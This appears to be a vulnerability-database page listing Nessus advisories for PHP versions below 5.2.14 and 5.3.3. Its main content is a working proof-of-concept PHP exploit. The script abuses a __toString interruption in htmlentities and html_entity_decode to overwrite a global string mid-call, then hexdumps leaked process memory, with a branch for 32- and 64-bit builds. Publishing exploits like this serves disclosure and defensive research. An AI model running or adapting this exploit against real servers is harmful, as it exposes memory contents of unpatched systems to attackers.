| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| PHP < 5.2.14 / 5.3.x < 5.3.3 Multiple Vulnerabilities | 27 Jul 201000:00 | – | nessus | |
| PHP < 5.3.3 / 5.2.14 Multiple Vulnerabilities | 27 Jul 201000:00 | – | nessus | |
| GLSA-201110-06 : PHP: Multiple vulnerabilities | 12 Oct 201100:00 | – | nessus | |
| PHP 5.2 < 5.2.14 Multiple Vulnerabilities | 4 Aug 201000:00 | – | nessus | |
| PHP 5.3 < 5.3.3 Multiple Vulnerabilities | 4 Aug 201000:00 | – | nessus | |
| openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0678-1) | 6 Oct 201000:00 | – | nessus | |
| openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0599-1) | 13 Sep 201000:00 | – | nessus | |
| openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0599-1) | 13 Jun 201400:00 | – | nessus | |
| SuSE 11 / 11.1 Security Update : Apache 2 (SAT Patch Numbers 2880 / 2881) | 2 Dec 201000:00 | – | nessus | |
| SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 7110) | 11 Oct 201000:00 | – | nessus |
<?php
class dummy
{
function __toString()
{
/* now the magic */
parse_str("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=1", $GLOBALS['var']);
return "";
}
}
/* Detect 32 vs 64 bit */
$i = 0x7fffffff;
$i++;
if (is_float($i)) {
$GLOBALS['var'] = str_repeat("A", 39);
} else {
$GLOBALS['var'] = str_repeat("A", 67);
}
/* Trigger the Code */
$x = html_entity_decode(htmlentities(&$GLOBALS['var'], 0, new dummy()), 0, "iso-8859-1");
hexdump($x);
/* Helper function */
function hexdump($x)
{
$l = strlen($x);
$p = 0;
echo "Hexdump\n";
echo "-------\n";
while ($l > 16) {
echo sprintf("%08x: ",$p);
for ($i=0; $i<16; $i++) {
echo sprintf("%02X ", ord($x[$p+$i]));
}
echo " ";
for ($i=0; $i<16; $i++) {
$c = ord($x[$p+$i]);
echo ($c < 32 || $c > 127) ? '.' : chr($c);
}
$l-=16;
$p+=16;
echo "\n";
}
if ($l > 0)
echo sprintf("%08x: ",$p);
for ($i=0; $i<$l; $i++) {
echo sprintf("%02X ", ord($x[$p+$i]));
}
for ($i=0; $i<16-$l; $i++) { echo "-- "; }
echo " ";
for ($i=0; $i<$l; $i++) {
$c = ord($x[$p+$i]);
echo ($c < 32 || $c > 127) ? '.' : chr($c);
}
echo "\n";
}
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation